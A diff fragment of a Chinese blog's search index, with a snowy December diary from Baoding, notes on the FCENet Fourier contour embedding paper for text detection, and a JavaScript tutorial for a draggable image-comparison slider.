    ​ 由于明天要下大雪,导师决定将组会提前到今日。本来组会都是轻松愉快的,结果这周要汇报的师弟油腔滑调🫣,导致导师非常生气😡!场面一度十分尴尬。

    低气压
    太可怕了
    两年了都没见过导师发过火
    太可怕了
    连伟哥都不敢摸了

    12.13

    下大雪了
    哇哦
    提前下班!

    ​ 在实验室摸鱼的时候外面下起了大雪,跑出去看看。

    ​ 出于网页加载速度的考虑,只能把录的视频压缩成很小的 gif 了。

    厕所窗外
    实验室门口

    ​ 下雪天真是太冷了,看了一会儿又回去了。

    ​ 这才知道,下雪天是不用打伞的😯。

    太冷了
    提前上班!

    png

    福州你咋回事?

    ​ 这就是差距吧。虽然在写博客的这天福州也很冷了。


    jpg

    雪人⛄

    ​ 下午跟舍友一起去堆雪人去了。根据网课上看的堆雪人教程,先用手搓一个雪球,然后在地上不断滚,越滚越大就行了。

    ​ 四个人一人整了一个雪球,分别组成头部、身体和腿部,一个雪人就这么诞生了!

    宿舍堆的
    获得最丑奖

    jpg

    一阵乱扔

    ​ 之后又打了一阵雪仗,玩得差不多了,这时间也快到晚饭时间了,不如直接去整个火锅吧🤪。

    jpg

    火锅

    ​ 在冬天吃火锅还蛮舒服的。

    jpg

    确实厉害啊

    ​ 本来觉得自己堆的雪人还可以,直到看到别人堆的才发觉自己堆得是真丑啊🫣。

    12.14

    雪松

    ​ 又是一天大雪,我终于开始对雪有点厌烦了,主要是下雪天太难走路了。

    12.15

    ​ 雪停了。众所周知,雪融化是要吸热的,所以这段时间,保定气温迎来了急剧下降!不论穿得有多厚,根本不能在外面待太长时间,不然你会耳朵疼😈。


    jpg jpg
    积雪

    ​ 很遗憾,保定连扫雪的钱都掏不起,解决方法是等雪自然晾干😅。


    ​ 充分利用好这那个三个月的时间,而且八张卡的算力其实是相对比较充裕了,课题组内其他的同学也可以一起用嘛,然后三个月之后的话。嗯,我会跟那个你导师去大概聊一下,因为中间也涉及到一个三个月之后,他的一个商务层面儿东西,可能涉及到一些水电费的一些问题,我们会简单收取一些水电费的一个费用。所以到时候也会跟你导师说一下这个事儿。

    ​ 智算中心的算力到了,大抵是最后一批了,得抓紧时间继续这些算力炼一堆没有用的东西😇,真的蛮浪费的。

    12.16

    ​ 英语六级。非常不幸地把作文写偏题了,又得再来一次了😅。

    12.17

    jpg

    这是哪位阳光大男孩干的?

    ​ 打卡宿舍楼下的怪物。

    jpg

    Who lives in a pineapple under the sea?

    ​ 打卡银杏大道前的菠萝屋。

    12.18

    走了
    下一站

    ​ 又有一个小伙伴被裁了,大抵是要离开福州了🫣。

    12.20

    ​ 组会时间。研一的终于完成了他们的一次汇报周期,导师说下次组会要改变形式了。

    ​ 导师说不要再发大水刊了,不!我的 Electronics😭。

    ​ 离寒假剩下最后一个月的时间,这个学期也即将接近尾声……

    12.21

    ​ 配置好了智算中心的环境,继续开跑!

    12.23

    ​ 开始优化博客主题,之前很难实现的搜索功能终于在我和 ChatGPT 的不懈努力下实现了!

    12.24

    ​ 宿舍好不容易聚齐了六个人,于是决定去外面吃顿火锅。

    jpg

    LONGBOO 2024

    ​ 2024 就要来到了!

    ​ 平安夜这天一点过节的气氛都没有,万达门口没有任何圣诞节的元素🙄,只有一些卖圣诞小礼品的地摊小贩。据说只有教堂附近还有点过节的气息。

    jpg

    潮汕牛肉火锅

    ​ 获得汕头大学一日体验卡!还蛮合我口味的,肉很鲜,而且没有点辣的选项,我想湖南阳哥吃得肯定很扫兴😇!

    jpg

    吃着火锅唱着歌

    ​ 吃完火锅宿舍又去 KTV 唱歌,不喜欢 KTV 的我听他们嚎了一会儿就回去休息了😇。

    jpg

    Merry Christmas!

    ​ 整了个圣诞帽,买了一些平安果🍎,就当是过圣诞节了🤪。

    ]]>
    @@ -3646,7 +3646,7 @@ /posts/Paper-Fourier%20Contour%20Embedding%20for%20Arbitrary-Shaped%20Text%20Detection/ - 资源
    @inproceedings{zhu2021fourier,
    title={Fourier contour embedding for arbitrary-shaped text detection},
    author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
    booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
    pages={3123--3131},
    year={2021}
    }

    正文

    Abstract

    ​ 对于 arbitrary-shaped text detection,现有方法大都通过笛卡尔坐标系或极坐标系中的掩模或轮廓点序列来对图像空间域中的文本实例进行建模。点序列表示可能对具有高度弯曲形状的文本建模的能力有限。

    ​ 为了解决这些问题,我们在傅立叶域中对文本实例进行建模,并提出了一种新的傅立叶轮廓嵌入(FCE)方法,将任意形状的文本轮廓表示为紧凑签名。

    ​ 我们进一步构建了具有骨干特征金字塔网络(FPN)和具有傅立叶逆变换(IFT)非最大值抑制(NMS)的简单后处理的 FCENet。与以往的方法不同,FCENet 首先预测文本实例的紧凑傅立叶特征,然后在测试过程中通过 IFT 和 NMS 重建文本轮廓。大量实验表明,即使在高度弯曲的形状下,FCE 也能准确、稳健地拟合场景文本的轮廓,并验证了 FCENet 在任意形状文本检测中的有效性和良好的泛化能力。

    ​ 在 CTW1500 和 TotalText 优于当前 SOTA!

    1. Introduction

    ​ 基于空间域的方法有明显的缺点。掩码表示可能导致本质上计算昂贵的后处理,并且经常需要大量的训练数据。轮廓点序列对高度弯曲的文本建模的能力可能有限。

    png

    这张图认为基于轮廓点序列(极坐标)建模的 TextRay 不能很好地对高度弯曲的文本进行建模。

    ​ 在本文中,我们通过傅立叶变换在傅立叶域而不是空间域中对文本实例轮廓进行建模,傅立叶变换可以以稳健而简单的方式通过渐进近似拟合任何闭合轮廓。

    ​ 为此,我们提出了傅立叶轮廓嵌入(FCE)方法,将点序列中的文本实例轮廓转换为傅立叶特征向量。

    • 首先,我们提出了一种重采样方案,以在每个文本轮廓上获得固定数量的密集点。为了保持生成的傅立叶签名向量的唯一性,我们将文本轮廓与通过文本中心点的水平线之间的最右侧交点设置为采样起点,将采样方向固定为顺时针方向,并保持沿文本轮廓的采样间隔不变。
    • 其次,通过傅立叶变换(FT)将空间域中轮廓的采样点序列嵌入到傅立叶域中。

    ​ FCE 用于文本实例表示的优势有三个方面:

    • Flexible:任何闭合的轮廓,包括极其复杂的形状,都可以精确地拟合;

    • Compactness(紧凑性):傅立叶特征向量是我们方法的紧凑性。在我们的实验中,傅立叶度 K=5 可以实现对文本的非常精确的近似。

    • Simplicity:采样点序列和文本轮廓的傅立叶特征向量之间的转换被公式化为 FT 和逆 FT。因此,FCE 方法易于实现,无需引入复杂的后处理。

    ​ 配备了 FCE,我们进一步构建了用于任意形状文本检测的 FCENet。特别地,它由具有可变形卷积网络(DCN)特征金字塔网络(FPN)傅立叶预测报头的 ResNet50 的主干组成。收割台有两个单独的分支。即分类分支回归分支。前者预测文本区域遮罩和文本中心区域遮罩。后者预测傅立叶域中的文本傅立叶特征向量,这些向量被馈送到傅立叶逆变换(IFT)中以重构文本轮廓点序列。地面实况文本轮廓点序列被用作监控信号。由于 FCE 的重采样方案,我们在回归分支中的损失在不同的数据集之间是兼容的,尽管 CTW1500 和 Total Text 等数据集对于每个文本实例具有不同数量的轮廓点。

    2.1. Segmentation-Based Methods

    ​ 基于分割的方法。

    2.2. Regression-Based Methods

    ​ 基于回归的方法。

    2.3. Explicit vs. Implicit Text Shape Representation

    ​ 从文本形状表示的角度来看,目前的模型大致可以分为两类。

    • 通过每像素掩模或通过变换特征重建的掩模对文本形状进行隐式建模的方法。
    • 使用笛卡尔系统或极坐标系统中的轮廓点序列对文本形状显式建模的方法。

    3. Approach

    3.1. Fourier Contour Embedding

    ​ 我们用实变量 $t\in [0,1]$ 的一个复值函数 $f:\mathbb{R}\mapsto\mathbb{C}$ 表示任意文本封闭轮廓如下:

    $$f(t)=x(t)+iy(t)$$

    ​ 其中 $i$ 表示虚单位。$(x(t),y(t))$ 表示在特定时间 $t$ 的空间坐标。由于 $f$ 是闭合轮廓,因此 $f(t)=f(t+1)$。$f(t)$ 可以通过傅立叶逆变换(IFT)重新表述为:

    $$f(t)=f(t,\mathbf{c})=\sum_{k=-\infty}{+\infty}\mathbf{c}_ke{2\pi ikt}$$

    ​ 其中 $k\in\mathbb Z$ 表示频率,$\mathbf c_k$ 是用于表征频率 k 的初始状态的复值傅立叶系数。上面方程中的每个分量 $\mathbf{c}_ke^{2\pi ikt}$ 表示具有给定初始手方向矢量 $\mathbf c_k$的固定频率 $k$ 的圆周运动。因此,轮廓可以被视为不同频繁圆周运动的组合,如下图中所示的粉红色圆圈。

    png

    ​ 由于在实际应用中我们无法获得文本轮廓函数 $f$ 的解析形式,因此我们可以将连续函数 $f$ 离散为 $N$ 个点,作为 $\left{f\left(\frac{n}{N}\right)\right}$,其中 $n\in [1,…,N]$。在这种情况下,$\mathbb c_k$ 可以通过傅立叶变换计算为:

    $$\mathbf{c}k=\frac1N\sum{n=1}^Nf(\frac nN)e^{-2\pi ik\frac nN}$$

    ​ 其中 $\mathbf c_k=u_k+iv_k$,其中 $u_k$ 是复数的实部并且 $v_k$ 是复数的像部。特别地,当 $k=0$ 时,$\mathbf c_0=u_0+iv_0=\frac{1}{N}\sum_nf\left(\frac{n}{N}\right)$ 是轮廓的中心位置。对于任何文本轮廓 $f$,我们提出的傅立叶轮廓嵌入(FCE)方法可以在傅立叶域中将其表示为紧致的 $2(2K+1)$ 维向量 $[u_{−K},v_{−K},…,u_0,v_0,…,u_K,v_K]$,称为傅立叶签名向量。

    ​ 我们的 FCE 方法包括两个阶段。即重采样阶段和傅里叶变换阶段。具体来说,在重采样阶段,我们在文本轮廓上等距采样固定数目的 N 个点(实验中 N = 400),得到重采样点序列 f。注意,这个重采样是必要的,由于不同的数据集具有不同数量的文本实例的基础真值点,并且它们相对较小。
    ​ 例如,CTW1500 中有 14 个,而 Total-Text 中有 4 ~ 8 个。重采样策略使我们的 FCE 兼容所有具有相同设置的数据集。在傅里叶变换阶段,重采样的点序列被变换成其相应的傅里叶特征向量。

    傅立叶特征向量的唯一性。从 FCE 的上述过程中,很容易看出,即使对于相同的文本轮廓,不同的重采样点序列也会导致不同的傅立叶特征向量。为了使一个特定文本的特征向量唯一,并更稳定地进行网络训练,我们对 $f(t)$ 的起点、采样方向和移动速度进行了约束:

    • 起点:我们将起点 $f(0)$(或 $f(1)$)设置为通过中心点 $(u_0,v0)$ 的水平线与文本轮廓之间的最右交点。

    • 采样方向:我们总是顺时针方向沿着文本轮廓对点进行重新采样。

    • 匀速:我们在文本轮廓上均匀地重新采样点,并且每两个相邻点之间的距离保持不变,以确保匀速。

    3.2. FCENet

    ​ 配备了 FCE,我们进一步提出了用于任意形状文本检测的无锚网络 FCENet。

    ​ 网络体系结构。我们提出的 FCENet 采用自上而下的方案。它包含以 DCN 为主干,以 FPN 为颈部提取多尺度特征的 ResNet50 和傅立叶预测报头。我们对 FPN 的特征图 P3、P4 和 P5 进行预测。表头有两个分支,分别负责分类和回归。

    ​ 每个分支由三个 $3\times 3$ 卷积层和一个 $1\times 1$ 卷积层组成,每个卷积层后面都有一个 ReLU 非线性激活层。


    ​ 损失函数:

    $$\mathcal L=\mathcal L_{cls}+\lambda\mathcal L_{reg}$$

    $$\mathcal L_{cls}=\mathcal L_{tr}+\mathcal L_{tcr}$$

    ​ 其中 $\mathcal L_{tr}$ 和 $\mathcal{L}{tcr}$ 分别是文本区域(TR)和文本中心区域(TCR)的交叉熵损失。为了解决样本不平衡问题,$\mathcal L{tr}$ 采用 OHEM,正负样本之比为 $3:1$。

    ​ 对于 $\mathcal L_{reg}$,我们不最小化预测的傅立叶特征向量与其相应的地面实况之间的距离。相反,我们在图像空间域中最小化它们重构的文本轮廓,这与文本检测质量更相关。正式地

    $$\mathcal{L}_{reg}=\frac{1}{N{'}}\sum_{i\in\mathcal{T}}\sum_{n=1}{N{'}}w_il_1(F{-1}(\frac{n}{N{'}},\bar{\mathbf{c}}_i),F{-1}(\frac{n}{N^{'}},\hat{\mathbf{c}}_i))$$

    ​ 其中 $l_1$ 是用于回归的光滑 $−l_1$ 损失,$F^{−1}(·)$ 是 IFT。$\mathcal T$ 是文本区域像素索引集。$\bar{\mathbf c}_i$ 和 $\hat{\mathbf c}_i$ 是文本真实傅立叶特征向量,并且如果像素i在其对应的文本中心区域中,则为像素 $i$ 的预测值 $w_i=1$,而如果不是,则为 $0.5$。$N^t$ 是文本轮廓上的采样数。如果 $N^t$ 太小(通常 $N^t<30$),可能会导致拟合过度。

    ​ 因此,我们在实验中固定了 $N^t=50$。

    4. Experiments

    4.1. Datasets

    • CTW1500
    • Total-Text
    • ICDAR2015

    4.2. Implementation Details

    4.3. Evaluation of FCE

    4.4. Evaluation of FCENet

    4.5. Evaluation on Benchmark Datasets

    4.6. Evaluation on Highly-curved Subset

    5. Conclusion

    ​ 本文主要研究任意形状文本检测的显式形状建模。我们提出了傅立叶轮廓嵌入方法,该方法可以精确地逼近任何闭合形状。然后,我们提出了 FCENet,它首先预测傅立叶域中文本实例的傅立叶特征向量,然后通过傅立叶逆变换重建图像空间域中的文本轮廓点序列。FCENet 可以以端到端的方式进行优化,并且无需任何复杂的后处理即可实现。对拟议的 FCE 和 FCENet 进行了广泛的评估。实验结果验证了 FCE 的表示能力,尤其是在高度弯曲的文本上,以及 FCENet 在小样本训练时的良好泛化能力。此外,FCENet 在 CTW1500、Total Text 上实现了 SOTA 性能,在 ICDAR2015 上取得了有竞争力的成绩。

    ]]>
    + 资源
    1
    2
    3
    4
    5
    6
    7
    @inproceedings{zhu2021fourier,
    title={Fourier contour embedding for arbitrary-shaped text detection},
    author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
    booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
    pages={3123--3131},
    year={2021}
    }

    正文

    Abstract

    ​ 对于 arbitrary-shaped text detection,现有方法大都通过笛卡尔坐标系或极坐标系中的掩模或轮廓点序列来对图像空间域中的文本实例进行建模。点序列表示可能对具有高度弯曲形状的文本建模的能力有限。

    ​ 为了解决这些问题,我们在傅立叶域中对文本实例进行建模,并提出了一种新的傅立叶轮廓嵌入(FCE)方法,将任意形状的文本轮廓表示为紧凑签名。

    ​ 我们进一步构建了具有骨干特征金字塔网络(FPN)和具有傅立叶逆变换(IFT)非最大值抑制(NMS)的简单后处理的 FCENet。与以往的方法不同,FCENet 首先预测文本实例的紧凑傅立叶特征,然后在测试过程中通过 IFT 和 NMS 重建文本轮廓。大量实验表明,即使在高度弯曲的形状下,FCE 也能准确、稳健地拟合场景文本的轮廓,并验证了 FCENet 在任意形状文本检测中的有效性和良好的泛化能力。

    ​ 在 CTW1500 和 TotalText 优于当前 SOTA!

    1. Introduction

    ​ 基于空间域的方法有明显的缺点。掩码表示可能导致本质上计算昂贵的后处理,并且经常需要大量的训练数据。轮廓点序列对高度弯曲的文本建模的能力可能有限。

    png

    这张图认为基于轮廓点序列(极坐标)建模的 TextRay 不能很好地对高度弯曲的文本进行建模。

    ​ 在本文中,我们通过傅立叶变换在傅立叶域而不是空间域中对文本实例轮廓进行建模,傅立叶变换可以以稳健而简单的方式通过渐进近似拟合任何闭合轮廓。

    ​ 为此,我们提出了傅立叶轮廓嵌入(FCE)方法,将点序列中的文本实例轮廓转换为傅立叶特征向量。

    • 首先,我们提出了一种重采样方案,以在每个文本轮廓上获得固定数量的密集点。为了保持生成的傅立叶签名向量的唯一性,我们将文本轮廓与通过文本中心点的水平线之间的最右侧交点设置为采样起点,将采样方向固定为顺时针方向,并保持沿文本轮廓的采样间隔不变。
    • 其次,通过傅立叶变换(FT)将空间域中轮廓的采样点序列嵌入到傅立叶域中。

    ​ FCE 用于文本实例表示的优势有三个方面:

    • Flexible:任何闭合的轮廓,包括极其复杂的形状,都可以精确地拟合;

    • Compactness(紧凑性):傅立叶特征向量是我们方法的紧凑性。在我们的实验中,傅立叶度 K=5 可以实现对文本的非常精确的近似。

    • Simplicity:采样点序列和文本轮廓的傅立叶特征向量之间的转换被公式化为 FT 和逆 FT。因此,FCE 方法易于实现,无需引入复杂的后处理。

    ​ 配备了 FCE,我们进一步构建了用于任意形状文本检测的 FCENet。特别地,它由具有可变形卷积网络(DCN)特征金字塔网络(FPN)傅立叶预测报头的 ResNet50 的主干组成。收割台有两个单独的分支。即分类分支回归分支。前者预测文本区域遮罩和文本中心区域遮罩。后者预测傅立叶域中的文本傅立叶特征向量,这些向量被馈送到傅立叶逆变换(IFT)中以重构文本轮廓点序列。地面实况文本轮廓点序列被用作监控信号。由于 FCE 的重采样方案,我们在回归分支中的损失在不同的数据集之间是兼容的,尽管 CTW1500 和 Total Text 等数据集对于每个文本实例具有不同数量的轮廓点。

    2.1. Segmentation-Based Methods

    ​ 基于分割的方法。

    2.2. Regression-Based Methods

    ​ 基于回归的方法。

    2.3. Explicit vs. Implicit Text Shape Representation

    ​ 从文本形状表示的角度来看,目前的模型大致可以分为两类。

    • 通过每像素掩模或通过变换特征重建的掩模对文本形状进行隐式建模的方法。
    • 使用笛卡尔系统或极坐标系统中的轮廓点序列对文本形状显式建模的方法。

    3. Approach

    3.1. Fourier Contour Embedding

    ​ 我们用实变量 $t\in [0,1]$ 的一个复值函数 $f:\mathbb{R}\mapsto\mathbb{C}$ 表示任意文本封闭轮廓如下:

    $$f(t)=x(t)+iy(t)$$

    ​ 其中 $i$ 表示虚单位。$(x(t),y(t))$ 表示在特定时间 $t$ 的空间坐标。由于 $f$ 是闭合轮廓,因此 $f(t)=f(t+1)$。$f(t)$ 可以通过傅立叶逆变换(IFT)重新表述为:

    $$f(t)=f(t,\mathbf{c})=\sum_{k=-\infty}{+\infty}\mathbf{c}_ke{2\pi ikt}$$

    ​ 其中 $k\in\mathbb Z$ 表示频率,$\mathbf c_k$ 是用于表征频率 k 的初始状态的复值傅立叶系数。上面方程中的每个分量 $\mathbf{c}_ke^{2\pi ikt}$ 表示具有给定初始手方向矢量 $\mathbf c_k$的固定频率 $k$ 的圆周运动。因此,轮廓可以被视为不同频繁圆周运动的组合,如下图中所示的粉红色圆圈。

    png

    ​ 由于在实际应用中我们无法获得文本轮廓函数 $f$ 的解析形式,因此我们可以将连续函数 $f$ 离散为 $N$ 个点,作为 $\left{f\left(\frac{n}{N}\right)\right}$,其中 $n\in [1,…,N]$。在这种情况下,$\mathbb c_k$ 可以通过傅立叶变换计算为:

    $$\mathbf{c}k=\frac1N\sum{n=1}^Nf(\frac nN)e^{-2\pi ik\frac nN}$$

    ​ 其中 $\mathbf c_k=u_k+iv_k$,其中 $u_k$ 是复数的实部并且 $v_k$ 是复数的像部。特别地,当 $k=0$ 时,$\mathbf c_0=u_0+iv_0=\frac{1}{N}\sum_nf\left(\frac{n}{N}\right)$ 是轮廓的中心位置。对于任何文本轮廓 $f$,我们提出的傅立叶轮廓嵌入(FCE)方法可以在傅立叶域中将其表示为紧致的 $2(2K+1)$ 维向量 $[u_{−K},v_{−K},…,u_0,v_0,…,u_K,v_K]$,称为傅立叶签名向量。

    ​ 我们的 FCE 方法包括两个阶段。即重采样阶段和傅里叶变换阶段。具体来说,在重采样阶段,我们在文本轮廓上等距采样固定数目的 N 个点(实验中 N = 400),得到重采样点序列 f。注意,这个重采样是必要的,由于不同的数据集具有不同数量的文本实例的基础真值点,并且它们相对较小。
    ​ 例如,CTW1500 中有 14 个,而 Total-Text 中有 4 ~ 8 个。重采样策略使我们的 FCE 兼容所有具有相同设置的数据集。在傅里叶变换阶段,重采样的点序列被变换成其相应的傅里叶特征向量。

    傅立叶特征向量的唯一性。从 FCE 的上述过程中,很容易看出,即使对于相同的文本轮廓,不同的重采样点序列也会导致不同的傅立叶特征向量。为了使一个特定文本的特征向量唯一,并更稳定地进行网络训练,我们对 $f(t)$ 的起点、采样方向和移动速度进行了约束:

    • 起点:我们将起点 $f(0)$(或 $f(1)$)设置为通过中心点 $(u_0,v0)$ 的水平线与文本轮廓之间的最右交点。

    • 采样方向:我们总是顺时针方向沿着文本轮廓对点进行重新采样。

    • 匀速:我们在文本轮廓上均匀地重新采样点,并且每两个相邻点之间的距离保持不变,以确保匀速。

    3.2. FCENet

    ​ 配备了 FCE,我们进一步提出了用于任意形状文本检测的无锚网络 FCENet。

    ​ 网络体系结构。我们提出的 FCENet 采用自上而下的方案。它包含以 DCN 为主干,以 FPN 为颈部提取多尺度特征的 ResNet50 和傅立叶预测报头。我们对 FPN 的特征图 P3、P4 和 P5 进行预测。表头有两个分支,分别负责分类和回归。

    ​ 每个分支由三个 $3\times 3$ 卷积层和一个 $1\times 1$ 卷积层组成,每个卷积层后面都有一个 ReLU 非线性激活层。


    ​ 损失函数:

    $$\mathcal L=\mathcal L_{cls}+\lambda\mathcal L_{reg}$$

    $$\mathcal L_{cls}=\mathcal L_{tr}+\mathcal L_{tcr}$$

    ​ 其中 $\mathcal L_{tr}$ 和 $\mathcal{L}{tcr}$ 分别是文本区域(TR)和文本中心区域(TCR)的交叉熵损失。为了解决样本不平衡问题,$\mathcal L{tr}$ 采用 OHEM,正负样本之比为 $3:1$。

    ​ 对于 $\mathcal L_{reg}$,我们不最小化预测的傅立叶特征向量与其相应的地面实况之间的距离。相反,我们在图像空间域中最小化它们重构的文本轮廓,这与文本检测质量更相关。正式地

    $$\mathcal{L}_{reg}=\frac{1}{N{'}}\sum_{i\in\mathcal{T}}\sum_{n=1}{N{'}}w_il_1(F{-1}(\frac{n}{N{'}},\bar{\mathbf{c}}_i),F{-1}(\frac{n}{N^{'}},\hat{\mathbf{c}}_i))$$

    ​ 其中 $l_1$ 是用于回归的光滑 $−l_1$ 损失,$F^{−1}(·)$ 是 IFT。$\mathcal T$ 是文本区域像素索引集。$\bar{\mathbf c}_i$ 和 $\hat{\mathbf c}_i$ 是文本真实傅立叶特征向量,并且如果像素i在其对应的文本中心区域中,则为像素 $i$ 的预测值 $w_i=1$,而如果不是,则为 $0.5$。$N^t$ 是文本轮廓上的采样数。如果 $N^t$ 太小(通常 $N^t<30$),可能会导致拟合过度。

    ​ 因此,我们在实验中固定了 $N^t=50$。

    4. Experiments

    4.1. Datasets

    • CTW1500
    • Total-Text
    • ICDAR2015

    4.2. Implementation Details

    4.3. Evaluation of FCE

    4.4. Evaluation of FCENet

    4.5. Evaluation on Benchmark Datasets

    4.6. Evaluation on Highly-curved Subset

    5. Conclusion

    ​ 本文主要研究任意形状文本检测的显式形状建模。我们提出了傅立叶轮廓嵌入方法,该方法可以精确地逼近任何闭合形状。然后,我们提出了 FCENet,它首先预测傅立叶域中文本实例的傅立叶特征向量,然后通过傅立叶逆变换重建图像空间域中的文本轮廓点序列。FCENet 可以以端到端的方式进行优化,并且无需任何复杂的后处理即可实现。对拟议的 FCE 和 FCENet 进行了广泛的评估。实验结果验证了 FCE 的表示能力,尤其是在高度弯曲的文本上,以及 FCENet 在小样本训练时的良好泛化能力。此外,FCENet 在 CTW1500、Total Text 上实现了 SOTA 性能,在 ICDAR2015 上取得了有竞争力的成绩。

    ]]>
    @@ -3675,7 +3675,7 @@ /posts/Server-%E6%B2%B3%E5%8C%97%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E8%AE%A1%E7%AE%97%E4%B8%AD%E5%BF%83/ -
    ]]>
    +
    ]]>
    @@ -3704,7 +3704,7 @@ /posts/Web-%E5%8F%AF%E4%BB%A5%E6%8B%96%E5%8A%A8%E7%9A%84%E7%99%BE%E5%8F%B6%E7%AA%97%E6%95%88%E6%9E%9C/ - 前言

    ​ 使用 JavaScript 实现的效果,不知道该怎么描述,给它命名为”可以拖动的百叶窗吧!“。

    代码

    CSS

    slider.css 用于存放样式:

    .slider {
    box-sizing: border-box;
    position: relative;
    width: 80%;
    padding-bottom: 56.25%;
    height: 0;
    margin: 0 auto;
    overflow: hidden;
    margin-top: 1em;
    margin-bottom: 1em;
    }
    .slider a {
    display: block;
    height: 100%;
    object-fit: cover;
    position: absolute;
    width: 100%;
    z-index: 1;
    }
    .mask {
    position: absolute;
    left: 49.5%; /* 初始化在中间 */
    top: 0;
    width: 1%; /* 滑块宽度 */
    height: 100%;
    background: rgba(0, 0, 0, 0.66); /* 半透明滑块 */
    cursor: ew-resize;
    z-index: 2;
    }

    .slider .left-image {
    clip-path: inset(0 50% 0 0); /* 初始剪裁右半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    .slider .right-image {
    clip-path: inset(0 0 0 50%); /* 初始剪裁左半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    JavaScript

    slider.js 用于实现滑块的逻辑,把它封装起来:

    class ImageSlider {
    constructor(mask, leftImage, rightImage, widthPercent) {
    this.mask = mask;
    this.leftImage = leftImage;
    this.rightImage = rightImage;
    this.isDragging = false;

    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';

    // 添加触摸事件监听器
    this.mask.addEventListener('touchstart', (e) => {
    this.isDragging = true;
    e.preventDefault(); // 阻止默认事件(如滚动)
    });
    document.addEventListener('touchend', () => {
    this.isDragging = false;
    });
    document.addEventListener('touchmove', (e) => {
    if (this.isDragging) {
    this.touchDrag(e);
    }
    });

    // 添加鼠标事件监听器
    this.mask.addEventListener('mousedown', (e) => {
    this.isDragging = true;
    e.preventDefault(); // 阻止默认事件(如选择文本)
    });
    document.addEventListener('mouseup', () => {
    this.isDragging = false;
    });
    document.addEventListener('mousemove', (e) => {
    if (this.isDragging) {
    this.drag(e);
    }
    });
    }

    // 触摸拖动事件处理函数
    touchDrag(e) {
    var rect = this.mask.parentNode.getBoundingClientRect();
    var x = e.touches[0].clientX - rect.left; // 获取触摸点相对于容器的位置
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }

    // 鼠标拖动事件处理函数
    drag(e) {
    var rect = this.mask.parentNode.getBoundingClientRect();
    var x = e.clientX - rect.left; // 获取鼠标相对于容器的位置
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }
    }

    function createImageSlider(sliderId, widthPercent=50) {
    const slider = document.getElementById(sliderId);
    const mask = slider.querySelector('.mask');
    const leftImage = slider.querySelector('.left-image');
    const rightImage = slider.querySelector('.right-image');
    return new ImageSlider(mask, leftImage, rightImage, widthPercent);
    }

    Html

    ​ 导入 css 和 js:

    <link rel="stylesheet" type="text/css" href="./slider.css">
    <script type="text/javascript" src="./slider.js"></script>

    ​ 使用这个效果:


    <div class="slider" id="slider1">
    <img class="left-image" src="left_1.jpg" alt="jpg" />
    <img class="right-image" src="right_1.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slider1', 67.5);</script>

    ...

    <div class="slider" id="slidern">
    <img class="left-image" src="left_n.jpg" alt="jpg" />
    <img class="right-image" src="right_n.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slidern', 48.5);</script>

    演示

    ​ 拿出珍藏私货!


    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    ]]>
    + 前言

    ​ 使用 JavaScript 实现的效果,不知道该怎么描述,给它命名为”可以拖动的百叶窗吧!“。

    代码

    CSS

    slider.css 用于存放样式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    .slider {
    box-sizing: border-box;
    position: relative;
    width: 80%;
    padding-bottom: 56.25%;
    height: 0;
    margin: 0 auto;
    overflow: hidden;
    margin-top: 1em;
    margin-bottom: 1em;
    }
    .slider a {
    display: block;
    height: 100%;
    object-fit: cover;
    position: absolute;
    width: 100%;
    z-index: 1;
    }
    .mask {
    position: absolute;
    left: 49.5%; /* 初始化在中间 */
    top: 0;
    width: 1%; /* 滑块宽度 */
    height: 100%;
    background: rgba(0, 0, 0, 0.66); /* 半透明滑块 */
    cursor: ew-resize;
    z-index: 2;
    }

    .slider .left-image {
    clip-path: inset(0 50% 0 0); /* 初始剪裁右半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    .slider .right-image {
    clip-path: inset(0 0 0 50%); /* 初始剪裁左半部分 */
    max-width: 100%;
    display: block;
    margin: 0;
    }

    JavaScript

    slider.js 用于实现滑块的逻辑,把它封装起来:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    class ImageSlider {
    constructor(mask, leftImage, rightImage, widthPercent) {
    this.mask = mask;
    this.leftImage = leftImage;
    this.rightImage = rightImage;
    this.isDragging = false;

    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
